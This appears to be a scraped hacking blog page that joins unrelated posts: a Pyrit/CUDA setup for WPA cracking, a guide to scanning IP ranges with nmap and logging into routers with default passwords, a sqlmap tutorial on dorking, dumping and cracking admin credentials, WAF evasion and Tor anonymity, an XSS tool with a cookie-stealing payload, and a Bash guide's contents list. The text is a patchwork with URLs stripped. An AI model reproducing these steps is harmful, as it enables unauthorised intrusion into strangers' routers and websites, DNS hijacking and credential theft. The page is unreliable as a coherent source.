I’ve installed the correct official proprietary NVIDIA driver on Kali Linux – NVIDIA Accelerated Linux Graphics Driver using the previous guide.

If you’ve completed both, move to next instruction.

Step 1: Install NVIDIA CUDA toolkit and openCL

At first we need to install NVIDIA CUDA toolkit and NVIDIA openCL

aptitude install nvidia-cuda-toolkit nvidia-opencl-icd

This will install CUDA packages in your Kali Linux. The total package is pretty large including dependencies, (282MB something), you be patient and let it finish.

Step 2: Download Pyrit and Cpyrit

Download Pyrit and Cpyrit from the official website:

Save them in your /root folder.

Step 3: Install Pyrit

Follow the instructions below to install Pyrit and it’s prerequisites.

Step 3.a: Install Pyrit prerequisites

apt-get install python2.7-dev python2.7-libpcap libpcap-dev

Step 3.b: Remove existing installation of Pyrit

Remove stock Pyrit using the following command:

apt-get remove pyrit

You get a message stating that it will also remove kali-linux-full package. It actually doesn’t. All it does updating Kali repo and remove Pyrit. Finish removing Pyrit.

If you are not using a clean install of Kali (not recommended), you may need to issue the following command:

rm -r /usr/local/lib/python2.7/dist-packages/cpyrit/

Step 3.c: Install new Pyrit

Copy paste the following commands to extract downloaded Pyrit in your Kali Linux /root directory

tar -xzf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0

Now build the package

python build

Once build is complete, you can install Pyrit.

python install

Up to this point, you shouldn’t receive any errors.

Step 4: Install CPyrit-cuda

Copy paste the following commands to extract downloaded CPyrit-cuda in your Kali Linux /root directory

tar -xzf cpyrit-cuda-0.4.0.tar.gz 
cd cpyrit-cuda-0.4.0

Now build the package

python build

Once build is complete, you can install CPyrit-cuda.

python install

Again, you shouldn’t receive any errors, if there’s error, go back and review each steps.

Step 5: Testing and troubleshooting

Now that we’ve installed NVIDIA driver kernel Module CUDA and Pyrit on Kali Linux, we should be able to test it. The best way to test is by issuing the following command:

pyrit list_cores

This gave me an error “ bash: /usr/bin/pyrit: No such file or directory “.

It seems this Pyrit puts its binaries in wrong folder than you’d expect. The actual path for Pyrit is now/usr/local/bin/pyrit

Step 5.a Softlink them or add path to profile

There’s two different ways you can resolve it. You can either softlink or add this /usr/local/bin/ path to your profile. Choice is again yours.

Step 5.a.i: Softlinking
This is what I’ve followed
ln -s /usr/local/bin/pyrit /usr/bin/pyrit

Step 5.a.ii: Add path

If you want only to specific user edit ~/.bash_profile or ~/.bashrc and put there

export PATH=$PATH:/usr/local/bin

If you want for all users edit /etc/profile and scroll down until you see something like

 PATH="/bin:/usr/bin:/sbin:/usr/sbin" export PATH

Append to the end /usr/local/bin. it will be


and Finally

Once you’ve either Softlinked or added the correct path to your profile, then following is what you get

root@kali:~# pyrit list_cores
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg
This code is distributed under the GNU General Public License v3+

The following cores seem available...
#1:  'CUDA-Device #1 'GeForce 210''
#2:  'CPU-Core (SSE2)'
#3:  'CPU-Core (SSE2)'
#4:  'CPU-Core (SSE2)'

and of course I did a benchmark with my GeForce 210 card:

root@kali:~# pyrit benchmark
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg
This code is distributed under the GNU General Public License v3+

Running benchmark (2744.1 PMKs/s)... -

Computed 2744.11 PMKs/s total.
#1: 'CUDA-Device #1 'GeForce 210'': 853.1 PMKs/s (RTT 3.0)
#2: 'CPU-Core (SSE2)': 648.1 PMKs/s (RTT 2.8)
#3: 'CPU-Core (SSE2)': 647.6 PMKs/s (RTT 2.9)
#4: 'CPU-Core (SSE2)': 658.5 PMKs/s (RTT 3.0)


Pyrit allows to create massive databases, pre-computing part of the IEEE 802.11 WPA/WPA2-PSKauthentication phase in a space-time-tradeoff. Exploiting the computational power of Many-Core- and other platforms through ATI-Stream, Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world’s most used security-protocols.

Here’s a great benchmark done with Pyrit and CUDA for different GPU’s

Thanks for reading. If this guide helped you to install NVIDIA driver kernel Module CUDA and Pyrit on Kali Linux – CUDA, Pyrit and Cpyrit-cuda, please share this article and follow me in Facebook/Twitter.

ah and don’t forget to show off your Pyrit Benchmark. ;)

Router Hack – How to hack ADSL router using NMAP

Asynchronous digital subscriber line (DSL or ADSL) modem is a device used to connect a computer or router to a telephone line which provides the digital subscriber line service for connectivity to the Internet, which is often called DSL or ADSL broadband. In this guide I will show you show you how to scan IP range for connected ADSL or DSL modem routers and find DSL ADSL router hack remotely. This guide applies to Windows, Linux or Mac, so it doesn’t matter what’s your Operating system is, you can try the same steps from all these operating systems. The term DSL or ADSL modem is technically used to describe a modem which connects to a single computer, through a USB port or is installed in a computer PCI slot. The more common DSL or ADSL router which combines the function of a DSL or ADSL modem and a home router, is a standalone device which can be connected to multiple computers through multiple Ethernet ports or an integral wireless access point. Also called a residential gateway, a DSL or ADSL router usually manages the connection and sharing of the DSL or ADSL service in a home or small office network.

Put this together with Wireshark hacking for http websites, you got a nightmare for the user behind that router as all their passwords and details can be tracked very easily.

What’s in a DSL ADSL Router?

A DSL or ADSL router consists of a box which has an RJ11 jack to connect to a standard subscriber telephone line. It has several RJ45 jacks for Ethernet cables to connect it to computers or printers, creating a local network. It usually also has a USB jack which can be used to connect to computers via a USB cable, to allow connection to computers without an Ethernet port. A wireless DSL or ADSL router also has antennas to allow it to act as a wireless access point, so computers can connect to it forming a wireless network. Power is usually supplied by a cord from a wall wart transformer. It usually has a series of LED status lights which show the status of parts of the DSL or ADSL communications link:

  1. Power light – indicates that the modem is turned on and has power.
  2. Ethernet lights – There is usually a light over each Ethernet jack. A steady (or sometimes flashing) light indicates that the Ethernet link to that computer or device is functioning
  3. DSL or ADSL light – a steady light indicates that the modem has established contact with the equipment in the local telephone exchange (DSL or ADSLAM) so the DSL or ADSL link over the telephone line is functioning
  4. Internet light – a steady light indicates that the IP address and DHCP protocol are initialized and working, so the system is connected to the Internet
  5. Wireless light – only in wireless DSL or ADSL modems, this indicates that the wireless network is initialized and working

Almost every ADSL DSL modem router provides a management web-page available via Internal network (LAN or Local area network) for device management, configuration and status reporting. You are supposed to login to the management web-page, configure a username password combination provided by your ISP (Internet service provider) which then allows you to connect to internet. The network is divided into two parts:

External Network

External network indicates the part where ADSL DSL modem routers connects to upstream provider for internet connectivity. Once connected to the ISP via a Phone line (ADSL DSL Modem routers can use conventional Copper Phone lines to connect to ISP at a much higher speed), the router gets an IP address. This is usually a Publicly routable IP address which is open to the whole world.

Internal Network

Internal network indicates the part where devices in Local Area Network connects to the ADSL DSL modem router via either Wireless or Ethernet cable. Most modem DSL ADSL Modem routers runs a DHCP server internally which assigns an Internall IP address to the connected device. When I say device, this can be anything from a conventional computer, a laptop, a phone (Android, Apple, Nokia or Blackberry etc.), A smart TV, A Car, NAS, SAN, An orange, A banana, A cow, A dragon, Harry Potter … I mean anything that’s able to connect to internet! So you get the idea. Each device get’s it’s own IP address, a Gateway IP and DNS entries. Depending on different DSL ADSL Modem router, this can be slightly different, but the idea remains the same, the DSL ADSL Router allows users to share internet connectivity. These DSL ADSL Modem Routers are like miniature Gateway devices that can have many services running on them. Usually they all use BusyBox or similar proprietary Linux applications on them. You want to know what a DSL ADSL Router can do? Here’s a list of common services that can run on a DSL ADSL Modem Router:

  1. ADSL2 and/or ADSL2+ support
  2. Antenna/ae (wireless)
  3. Bridge/Half-bridge mode
  4. Cookie blocking
  5. DHCP server
  6. DDNS support
  7. DoS protection
  8. Switching
  9. Intrusion detection
  10. LAN port rate limiting
  11. Inbuilt firewall
  12. Inbuilt or Free micro-filter
  13. Java/ActiveX applet blocking
  14. Javascript blocking
  15. MAC address filtering
  16. Multiple public IP address binding
  17. NAT
  18. Packet filter
  19. Port forwarding/port range forwarding
  20. POP mail checking
  21. QoS (especially useful for VoIP applications)
  22. RIP-1/RIP-2
  23. SNTP facility
  24. SPI firewall
  25. Static routing
  26. So-called “DMZ” facility
  27. RFC1483 (bridged/routed)
  28. IPoA
  29. PPPoE
  30. PPPoA
  31. Embedded PPPoX login clients
  32. Parental controls
  33. Print server inbuilt
  34. Scheduling by time/day of week
  35. USB print server
  36. URL blocking facility
  37. UPnP facility
  38. VPN pass-through
  39. Embedded VPN servers
  40. WEP 64/128/256 bit (wireless security)
  41. WPA (wireless security)
  42. WPA-PSK (wireless security)

That’s a lot of services running on a small device that are configured by nanny, granny, uncle, aunt and the next door neighbour, in short many non technical people around the world. How many of those configured badly? Left ports open left right and center? Didn’t change default admin passwords? Many! I mean MANY! In this guide we will use namp to scan a range of IP addresses, from output we will determine which are DSL ADSL Routers and have left their Management ports open to External Network. (again read top section to know which one is a external network). A typical ADSL Router’s Management interface is available via following URL:

This is the Management page for DSL ADSL modem router and it’s always protected by a password. By default, this password is written below a DSL ADSL modem router in a sticker and they are one of these combinations: Username/Password


A lot of the home users doesn’t change this password. Well, that’s ok. It doesn’t hurt much cause this is only available via a connected device. But what’s not OKAY is when users open up their management to the external network. All you need to know what’s the Public IP address for your target and just try to access this management page externally.

Installing NMAP

I use Kali Linux which comes with NMAP Preinstalled. If you are using Windows or Mac (or any other flavour of Linux) go to the following website to download and install NMAP.

Linux Installation:

For Ubuntu, Debian or aptitude based system NMAP is usually made available via default repository. Install NMAP using the following command:

sudo apt-get install nmap

For YUM Based systems such as Redhat, CentOS, install via

sudo yum install nmap

For PACMAN based systems such as Arch Linux, install via

sudo pacman -S nmap

Windows Installation:

For Windows Computers, download installer and run the executable. Link:

Mac Installation:

For Mac users, download installer and install Link:

Official NMAP site

You can read more about NMAP here:

Search for Vulnerable Routers

Now that we have NMAP sorted, we are going to run the following command to scan for ADSL Modem Routers based on their Banner on Port 80 to start our ADSL router hack. All you need is to pick an IP range. I’ve used an example below using range.

Search from Linux using command Line

In Linux run the following command:

nmap -sS -sV -vv -n -Pn -T5 -p80 -oG - | grep 'open' | grep -v 'tcpwrapped'

In Windows or Mac open NMAP and copy paste this line:

nmap -sS -sV -vv -n -Pn -T5 -p80 -oG -

Once it finds the results, search for the word ‘open’ to narrow down results. A typical Linux NMAP command would return outputs line below: (and of course I’ve changed the IP details)

Host: ()  Ports: 80/open/tcp//tcpwrapped///
Host: ()  Ports: 80/open/tcp//http//micro_httpd/
Host: ()  Ports: 80/open/tcp//tcpwrapped///
Host: () Ports: 80/open/tcp//tcpwrapped///
Host: () Ports: 80/open/tcp//http//Fortinet VPN|firewall http config/
Host: () Ports: 80/open/tcp//tcpwrapped///
Host: () Ports: 80/open/tcp//http?///
Host: () Ports: 80/open/tcp//tcpwrapped///
Host: () Ports: 80/open/tcp//http?///
Host: () Ports: 80/open/tcp//http?///
Host: () Ports: 80/open/tcp//http//Gadspot|Avtech AV787 webcam http config/
Host: () Ports: 80/open/tcp//http?///
Host: () Ports: 80/open/tcp//ssl|http//thttpd/
Host: () Ports: 80/open/tcp//http?///
Host: () Ports: 80/open/tcp//tcpwrapped///
Host: () Ports: 80/open/tcp//http//Gadspot|Avtech AV787 webcam http config/
Host: () Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: () Ports: 80/open/tcp//http//Apache httpd/
Host: () Ports: 80/open/tcp//http//micro_httpd/
Host: ()        Ports: 80/open/tcp//http?///
Host: ()        Ports: 80/open/tcp//http?///
Host: ()        Ports: 80/open/tcp//tcpwrapped///
Host: ()        Ports: 80/open/tcp//tcpwrapped///
Host: ()        Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: ()        Ports: 80/open/tcp//tcpwrapped///
Host: ()        Ports: 80/open/tcp//http//micro_httpd/
Host: ()        Ports: 80/open/tcp//http//Microsoft IIS httpd 6.0/
Host: ()        Ports: 80/open/tcp//tcpwrapped///
Host: ()        Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: ()        Ports: 80/open/tcp//http?///
Host: ()        Ports: 80/open/tcp//tcpwrapped///
Host: ()        Ports: 80/open/tcp//tcpwrapped///
Host: ()        Ports: 80/open/tcp//http//Apache httpd 2.2.15 ((CentOS))/
Host: ()        Ports: 80/open/tcp//tcpwrapped///
Host: ()        Ports: 80/open/tcp//http//Allegro RomPager 4.51 UPnP|1.0 (ZyXEL ZyWALL 2)/

This was taking a long time (we are after all try to scan 256 hosts using the command above). Me being just impatient, I wanted to check if my Kali Linux was actually doing anything to ADSL router hack. I used the following command in a separate Terminal to monitor what my PC was doing… it was doing a lot …

tcpdump -ni eth0

That’s a lot of connected hosts with TCP Port 80 open. Some got ‘tcpwrapped’ marked on them. It means they are possibly not accessible.

Search from Windows, Mac or Linux using GUI – NMAP or Zenmap

Assuming you got NMAP installation sorted, you can now open NMAP (In Kali Linux or similar Linux distro, you can use Zenmap which is GUI version of NAMP cross platform). Copy paste the following line in Command field

nmap -sS -sV -vv -n -Pn -T5 -p80 -oG -

another version of this command is using different representation of Subnet MASK.

nmap -sS -sV -vv -n -Pn -T5 -p80 -oG -

Press SCAN Button and wait few minutes till the scan is over.

Remote Router Hack - Hack ADSL router using NMAP - blackMORE Ops - 4

Once you have some results, then you need to find the open devices with open ports. In search Result page:

  1. Click on Services Button
  2. Click on http Service
  3. Click on Ports/Hosts TAB (Twice to sort them by status)

As you can see, I’ve found a few devices with open http port 80.

Remote Router Hack - Hack ADSL router using NMAP - blackMORE Ops - 5

It is quite amazing how many devices got ports open facing outer DMZ.

Access Management Webpage

Pick one at a time. For example try this:

You get the idea. If it opens a webpage asking for username and password, try one of the following combinations:


If you can find the Router’s model number and make, you can find exact username and password from this webpage: Before we finish up, I am sure you were already impatient like me as a lot of the routers had ‘tcpwrapped’ on them which was actually stopping us from accessing the web management interface to ADSL router hack. Following command will exclude those devices from our search. I’ve also expanded my search to a broader range using a slightly different Subnet MASK.

nmap -sS -sV -vv -n -Pn -T5 -p80 -oG - | grep 'open' | grep -v 'tcpwrapped'

In this command I am using /22 Subnet Mask with 2 specific outputs: I am looking for the work ‘open’ and excluding ‘tcpwrapped’ on my output. As you can see, I still get a lot of outputs.


You’ll be surprised how many have default username and passwords enabled. Once you get your access to the router, you can do a lot more, like DNS hijacking, steal username and passwords (for example: Social Media username passwords (FaceBook, Twitter, WebMail etc.)) using tcpdump/snoop on router’s interface and many more using ADSL router hack …

There’s many things you can do after you’ve got access to a router. You can change DNS settings, setup a tcpdump and later snoop all plaintext passwords using wireshark etc. If you know a friends, family. colleague or neighbor who didn’t change their routers default password, let them know of the risks.

But I am not here to judge whether it should be done or not, but this is definitely a way to gain access to a router. So hacking is not always bad, it sometime is required when you loose access or a system just wouldn’t respond. As a pentester, you should raise awareness. Share this guide as anyone who uses a Linux, Windows, Mac can use this guide to test their own network and fix ADSL router hack issue.

Playing With SQL Injection And Firewall Bypassing

Playing with SQL Injection and Firewall Bypassing


Most cyber-attacks in the world that involve websites occurs due to lack of updates and configuration faults resulting in explorations of success.

One of the main threats is SQL Injection that left many worried about their systems, programmers, and SQL databases.

The biggest problem is not the DBMS itself but the lack of definition and verification of the input fields in web applications.


Many web developers do not know how SQL queries can be handled and assume that an SQL query is a trusted command. This allows for SQL queries to circumvent access controls, thereby bypassing standard authentication and authorization checks. And sometimes SQL queries even may allow access to the command shell on the server operating system level.

Direct injection of SQL commands is a technique where an attacker creates or alters existing SQL commands to expose hidden data or to override valuable data, and even to execute dangerous system level commands on the server.


Structured Query Language is the standard declarative language for relational databases. This allows for its simplicity and ease of use.

SQL was originally developed in the early 70s at IBM labs.

SQLMAP is a tool used for this type of vulnerability.

It is Open source, and often is used for Penetration Testing that enable intrusions on fragile DBMS written in Python. It provides functions to detect and exploit vulnerabilities of SQLI. Let’s use the example, widely used in operating systems and databases.


Readers I will try to explain this in the simplest possible way.

You must have a vulnerable target, to find out if the target is vulnerable just input at the end of the URL being tested and press “Enter” if some error is returned the database is vulnerable.

You can use google to find it with some dork. Example: inurl: news.php id = 1?

There is a bank of google dorks data and several other possibilities that can be used to filter your search.

cd /pentest/database/sqlmap

We will now begin the game, to view the menu for use the command ./ -h

Let’s run, the parameter [–dbs], to search the all databases in DBMS.

Or use the parameter –current-db to show the databases that are being used.

The parameter -D is for the target of database and –tables is tables list.

We will verify the existence of interesting information in the table (admin_users), time to list the columns. The parameter is –columns.

It is important to always indicate the target database (-D) data before listing the tables because if you do not do this (without the -D) it will list all tables in all databases.

-T = target table

-C = target columns, can be more than one column to be chosen. Example: username, password.

–dump = obtain, extract data.

Important to remember the parameter –proxy: enables use of proxy.
Example:  / –url “; –dbs –proxy=

Readers, I think that’s the basics for beginners. also has many interesting functions, I suggest researching about –prefix=PREFIX, –postfix=POSTFIX and takeover options.

More information about the program and videos of them in action on the official site.

–dump is to extract the data from the site but is not given any, this must be within the selected column, and you have to choosen what to extract from the column, where I extracted the logins and passwords are saved within the column.

Generally, the field of “passwords” DBMS are encrypted.

We then need to decrypt the passwords in order to access the target system.

We can find a way to log into the system. But wait, the passwords are encrypted in MD5, hahahaha put your hash on: and may be decrypted or otherwise


Readers, lucky for us, there are some awesome tamper scripts for sqlmap, which can be found in the latest development version from the Subversion repository.

svn checkout sqlmap-dev

In fact the function of the tamper scripts is to modify the request in a way that will escape detection rules WAF (Web Application Firewall). In some cases it may be necessary to combine some tamper scripts together in order to fool the WAF. For a complete list of scripts for tampering, you may find

Many enterprises often overlook the current vulnerabilities and rely only on the firewall for protection. Unfortunately, most, if not all firewalls can be bypassed. So gentlemen, I want to demonstrate how to use some of the new features of sqlmap to bypass WAF’s/IDS.

Well, I’ll demonstrate some important scripts that are and to work with MySQL.

Hands-on: To begin using tamper scripts, you use the –tamper followed by the script name. In the example, we use the command:

Summary of

Quite simply, this script is useful for ignoring very weak web application firewalls (WAF) …

Another interesting function url-decode the request before processing it through their set of rules (:

The web server will anyway go to url-decoded back version, concluding, it should work against any DBMS.

Example to use:

We will demonstrate the use of for additional security. The vast number of organizations have deployed WAF. Guys, this is a tricky part to exploit such an environment. Well, standard SQL injection attack vectors will not work neither will the scripts.

That is the reason we use tamper scripts, this facility known as “tamper scripts” in aid of a quiet way to bypass web application firewalls.
Guys, I have demonstrated just a few of the many tamper scripts. We highly recommend testing them out as each one can be used in different situations.
Notes: That’s not a tool for “script kiddies” it is of utmost importance to make use of such a powerful tool responsibly and maturely.

Caution if used in the wrong way, sqlmap generates many queries and can affect the performance of the database target, moreover strange entries and changes to the database schema are possible if the tool is not controlled and used extensively.


I will demonstrate to you how to use sqlmap with The Onion Router for the protection of IP, DNS, etc… In your Linux, in the terminal type:

$ sudo apt-get install tor tor-geoip

After enter the sqlmap folder and type:

./ -u “; -b -a –tor –check-tor–user-agent=”Mozilla/5.0 (compatible; Googlebot/2.1; +”

The argument –tor invokes the Tor to be used and the –check-tor checks if Tor is being used properly, if not, you will receive an error message in red at the terminal. The User Agent is the googlebot, all your requests on the site will look like the Google bot doing a little visit.

TOR at SQLMap, we can set your TOR proxy for hiding the source from where the traffic or request is generated.

–tor-port, –tor-type :  the parameter can help you out to set the TOR proxy manually.

check-tor : the parameter will check if the tor setup is appropriate and functional.


It is known that many targets have been explored through SQL Injection a few years ago when this threat was discovered, the injection form was “the nail”. The pentester had to enter the codes manually, taking longer to complete the attack.

Then came the development of programs that automated attack. Nowadays perhaps the best known of these programs is SQLMAP is a program of open source testing framework written in Python. It has full support for database systems: MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB and also supports 6 types of SQL Injection techniques.


  1. Correct the SQL server regularly.
  2. Limit the use of dynamic queries.
  3. Escape input data from users.
  4. Stores the credentials of the database in a separate file.
  5. Use the principle of least privilege.
  6. Turn off the magic quotes.
  7. Disable shell access.
  8. Disable any feature of the bank that you do not need
  9. Test your code
  10. Search in google advanced techniques to correct this vulnerability.

XSSYA V-2.0 For Cross Site Scripting Vulnerability Confirmation Written In Python

XSSYA-V-2.0 (XSS Vulnerability Confirmation )

XSSYA is a Cross Site Scripting Scanner & Vulnerability Confirmation (Working in two Methods) • Method number 1 for Confirmation Request and Response • Method number 2 for Confirmation Execute encoded payload and search for the same payload in web HTML code but decoded • Support HTTPS • After Confirmation (execute payload to get cookies) • Identify 3 Types of WAF (Mod_Security – WebKnight – F5 BIG IP) • Can be run in (Windows – Linux) XSSYA Continue Library of Encoded Payloads To Bypass WAF (Web Application Firewall) It Also Support Saving the Web Html Code Before Executing the Payload Viewing the Web HTML Code into the Screen or Terminal $ Python Example $ Python

• What have been changed? (XSSYA v 2.0 has more payloads; library contains 41 payloads to enhance detection level XSS scanner is now removed from XSSYA to reduce false positive URLs to be tested used to not allow any character at the end of the URL except (/ – = -?) but now this limitation has been removed

• What’s new in XSSYA V2.0 ? Custom Payload 1 – You have the ability to Choose your Custom Payload Ex: and you can encode your custom payload with different types of encodings like (B64 – HEX – URL_Encode –- HEX with Semi Columns)

(HTML Entities à Single & Double Quote only – brackets – And – or Encode all payload with HTML Entities) This feature will support also XSS vulnerability confirmation method which is you choose you custom payload and custom Encoding execute if response 200 check for same payload decoded in HTM code page.

• What’s new in XSSYA V2.0? HTML5 Payloads XSYSA V2.0 contains a library of 44 HTLM5 payloads

• What’s New in XSSYA V 2.0?

XSSYA have a Library for the most vulnerable application with XSS – Cross site scripting and this library counting (Apache – WordPress – PHPmy Admin) If you choose apache application it give the CVE Number version of Apache which is affected and the link for CVE for more details so it will be easy to search for certain version that is affected with XSS

• What’s New in XSSYA V 2.0? XSSYA has the feature to convert the IP address of the attacker to (Hex, Dword, Octal) to bypass any security mechanism or IPS that will be exist on the target Domain

• What’s New in XSSYA V 2.0?

XSSYA check is the target is Vulnerable to XST (Cross Site Trace) which it sends custom Trace Request and check if the target domain is Vulnerable the request will be like this:

TRACE / HTTP/1.0 Host: Header1: < script >alert(document.cookie);

The Module need to be downloaded is colorama-0.2.7 gdshortener 0.0.2

More information can be found at:

Advanced Bash-Scripting Guide – An in-depth exploration of the art of shell scripting

Advanced Bash-Scripting Guide

An in-depth exploration of the art of shell scripting

Mendel Cooper


10 Mar 2014

Revision History
Revision 6.5 05 Apr 2012 Revised by: mc
Revision 6.6 27 Nov 2012 Revised by: mc
Revision 10 10 Mar 2014 Revised by: mc
This tutorial assumes no previous knowledge of scripting or programming, yet progresses rapidly toward an intermediate/advanced level of instruction . . . all the while sneaking in little nuggets of UNIX® wisdom and lore. It serves as a textbook, a manual for self-study, and as a reference and source of knowledge on shell scripting techniques. The exercises and heavily-commented examples invite active reader participation, under the premise that the only way to really learn scripting is to write scripts.

This book is suitable for classroom use as a general introduction to programming concepts.

This document is herewith granted to the Public Domain. No copyright!


For Anita, the source of all the magic

Table of Contents
Part 1. Introduction
1. Shell Programming!
2. Starting Off With a Sha-Bang
Part 2. Basics
3. Special Characters
4. Introduction to Variables and Parameters
5. Quoting
6. Exit and Exit Status
7. Tests
8. Operations and Related Topics
Part 3. Beyond the Basics
9. Another Look at Variables
10. Manipulating Variables
11. Loops and Branches
12. Command Substitution
13. Arithmetic Expansion
14. Recess Time
Part 4. Commands
15. Internal Commands and Builtins
16. External Filters, Programs and Commands
17. System and Administrative Commands
Part 5. Advanced Topics
18. Regular Expressions
19. Here Documents
20. I/O Redirection
21. Subshells
22. Restricted Shells
23. Process Substitution
24. Functions
25. Aliases
26. List Constructs
27. Arrays
28. Indirect References
29. /dev and /proc
30. Network Programming
31. Of Zeros and Nulls
32. Debugging
33. Options
34. Gotchas
35. Scripting With Style
36. Miscellany
37. Bash, versions 2, 3, and 4
38. Endnotes
38.1. Author’s Note
38.2. About the Author
38.3. Where to Go For Help
38.4. Tools Used to Produce This Book
38.5. Credits
38.6. Disclaimer
A. Contributed Scripts
B. Reference Cards
C. A Sed and Awk Micro-Primer
C.1. Sed
C.2. Awk
D. Parsing and Managing Pathnames
E. Exit Codes With Special Meanings
F. A Detailed Introduction to I/O and I/O Redirection
G. Command-Line Options
G.1. Standard Command-Line Options
G.2. Bash Command-Line Options
H. Important Files
I. Important System Directories
J. An Introduction to Programmable Completion
K. Localization
L. History Commands
M. Sample .bashrc and .bash_profile Files
N. Converting DOS Batch Files to Shell Scripts
O. Exercises
O.1. Analyzing Scripts
O.2. Writing Scripts
P. Revision History
Q. Download and Mirror Sites
R. To Do List
S. Copyright
T. ASCII Table
List of Examples
2-1. cleanup: A script to clean up log files in /var/log
2-2. cleanup: An improved clean-up script
2-3. cleanup: An enhanced and generalized version of above scripts.
3-1. Code blocks and I/O redirection
3-2. Saving the output of a code block to a file
3-3. Running a loop in the background
3-4. Backup of all files changed in last day
4-1. Variable assignment and substitution
4-2. Plain Variable Assignment
4-3. Variable Assignment, plain and fancy
4-4. Integer or string?
4-5. Positional Parameters
4-6. wh, whois domain name lookup
4-7. Using shift
5-1. Echoing Weird Variables
5-2. Escaped Characters
5-3. Detecting key-presses
6-1. exit / exit status
6-2. Negating a condition using !
7-1. What is truth?
7-2. Equivalence of test, /usr/bin/test, [ ], and /usr/bin/[
7-3. Arithmetic Tests using (( ))
7-4. Testing for broken links
7-5. Arithmetic and string comparisons
7-6. Testing whether a string is null
7-7. zmore
8-1. Greatest common divisor
8-2. Using Arithmetic Operations
8-3. Compound Condition Tests Using && and ||
8-4. Representation of numerical constants
8-5. C-style manipulation of variables
9-1. $IFS and whitespace
9-2. Timed Input
9-3. Once more, timed input
9-4. Timed read
9-5. Am I root?
9-6. arglist: Listing arguments with $* and $@
9-7. Inconsistent $* and $@ behavior
9-8. $* and $@ when $IFS is empty
9-9. Underscore variable
9-10. Using declare to type variables
9-11. Generating random numbers
9-12. Picking a random card from a deck
9-13. Brownian Motion Simulation
9-14. Random between values
9-15. Rolling a single die with RANDOM
9-16. Reseeding RANDOM
9-17. Pseudorandom numbers, using awk
10-1. Inserting a blank line between paragraphs in a text file
10-2. Generating an 8-character “random” string
10-3. Converting graphic file formats, with filename change
10-4. Converting streaming audio files to ogg
10-5. Emulating getopt
10-6. Alternate ways of extracting and locating substrings
10-7. Using parameter substitution and error messages
10-8. Parameter substitution and “usage” messages
10-9. Length of a variable
10-10. Pattern matching in parameter substitution
10-11. Renaming file extensions:
10-12. Using pattern matching to parse arbitrary strings
10-13. Matching patterns at prefix or suffix of string
11-1. Simple for loops
11-2. for loop with two parameters in each [list] element
11-3. Fileinfo: operating on a file list contained in a variable
11-4. Operating on a parameterized file list
11-5. Operating on files with a for loop
11-6. Missing in [list] in a for loop
11-7. Generating the [list] in a for loop with command substitution
11-8. A grep replacement for binary files
11-9. Listing all users on the system
11-10. Checking all the binaries in a directory for authorship
11-11. Listing the symbolic links in a directory
11-12. Symbolic links in a directory, saved to a file
11-13. A C-style for loop
11-14. Using efax in batch mode
11-15. Simple while loop
11-16. Another while loop
11-17. while loop with multiple conditions
11-18. C-style syntax in a while loop
11-19. until loop
11-20. Nested Loop
11-21. Effects of break and continue in a loop
11-22. Breaking out of multiple loop levels
11-23. Continuing at a higher loop level
11-24. Using continue N in an actual task
11-25. Using case
11-26. Creating menus using case
11-27. Using command substitution to generate the case variable
11-28. Simple string matching
11-29. Checking for alphabetic input
11-30. Creating menus using select
11-31. Creating menus using select in a function
12-1. Stupid script tricks
12-2. Generating a variable from a loop
12-3. Finding anagrams
15-1. A script that spawns multiple instances of itself
15-2. printf in action
15-3. Variable assignment, using read
15-4. What happens when read has no variable
15-5. Multi-line input to read
15-6. Detecting the arrow keys
15-7. Using read with file redirection
15-8. Problems reading from a pipe
15-9. Changing the current working directory
15-10. Letting let do arithmetic.
15-11. Showing the effect of eval
15-12. Using eval to select among variables
15-13. Echoing the command-line parameters
15-14. Forcing a log-off
15-15. A version of rot13
15-16. Using set with positional parameters
15-17. Reversing the positional parameters
15-18. Reassigning the positional parameters
15-19. “Unsetting” a variable
15-20. Using export to pass a variable to an embedded awk script
15-21. Using getopts to read the options/arguments passed to a script
15-22. “Including” a data file
15-23. A (useless) script that sources itself
15-24. Effects of exec
15-25. A script that exec’s itself
15-26. Waiting for a process to finish before proceeding
15-27. A script that kills itself
16-1. Using ls to create a table of contents for burning a CDR disk
16-2. Hello or Good-bye
16-3. Badname, eliminate file names in current directory containing bad characters and whitespace.
16-4. Deleting a file by its inode number
16-5. Logfile: Using xargs to monitor system log
16-6. Copying files in current directory to another
16-7. Killing processes by name
16-8. Word frequency analysis using xargs
16-9. Using expr
16-10. Using date
16-11. Date calculations
16-12. Word Frequency Analysis
16-13. Which files are scripts?
16-14. Generating 10-digit random numbers
16-15. Using tail to monitor the system log
16-16. Printing out the From lines in stored e-mail messages
16-17. Emulating grep in a script
16-18. Crossword puzzle solver
16-19. Looking up definitions in Webster’s 1913 Dictionary
16-20. Checking words in a list for validity
16-21. toupper: Transforms a file to all uppercase.
16-22. lowercase: Changes all filenames in working directory to lowercase.
16-23. du: DOS to UNIX text file conversion.
16-24. rot13: ultra-weak encryption.
16-25. Generating “Crypto-Quote” Puzzles
16-26. Formatted file listing.
16-27. Using column to format a directory listing
16-28. nl: A self-numbering script.
16-29. manview: Viewing formatted manpages
16-30. Using cpio to move a directory tree
16-31. Unpacking an rpm archive
16-32. Stripping comments from C program files
16-33. Exploring /usr/X11R6/bin
16-34. An “improved” strings command
16-35. Using cmp to compare two files within a script.
16-36. basename and dirname
16-37. A script that copies itself in sections
16-38. Checking file integrity
16-39. Uudecoding encoded files
16-40. Finding out where to report a spammer
16-41. Analyzing a spam domain
16-42. Getting a stock quote
16-43. Updating FC4
16-44. Using ssh
16-45. A script that mails itself
16-46. Generating prime numbers
16-47. Monthly Payment on a Mortgage
16-48. Base Conversion
16-49. Invoking bc using a here document
16-50. Calculating PI
16-51. Converting a decimal number to hexadecimal
16-52. Factoring
16-53. Calculating the hypotenuse of a triangle
16-54. Using seq to generate loop arguments
16-55. Letter Count”
16-56. Using getopt to parse command-line options
16-57. A script that copies itself
16-58. Exercising dd
16-59. Capturing Keystrokes
